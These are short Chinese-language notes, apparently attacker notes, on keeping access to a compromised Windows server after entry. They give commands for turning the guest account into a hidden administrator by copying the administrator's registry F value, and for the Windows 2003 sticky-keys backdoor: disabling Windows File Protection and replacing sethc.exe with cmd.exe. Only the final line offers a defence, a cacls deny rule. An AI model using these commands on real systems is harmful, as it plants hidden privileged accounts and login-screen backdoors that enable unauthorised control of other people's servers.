一进服务器后开启隐藏来宾用户

禁止账号登陆：guest

1.改guest密码：

net user guest pass XX

2.开始--regedit.exe---machine--domain--account--1f4：administrator

      1f5：guest

吧1f4中的f值复制到1f5中

二.win2003：shift后门：

五次shift--粘滞键---：sethc.exe替换为cmd.exe，explorer.exe

WFP：破坏WINDOWS文件保护

1.cd c:\windows\system32\dllcache 

 attrib -s -r -h sethc.exe

 ren sethc.exe ~.*（阻断源头）

2.cd c:\windows\system32

 attrib -s -r -h sethc.exe

 copy cmd.exe sethc.exe

explorer.exe进桌面

3.防御：

cd c：\windows\system32

cacls sethc.exe/p everyone：n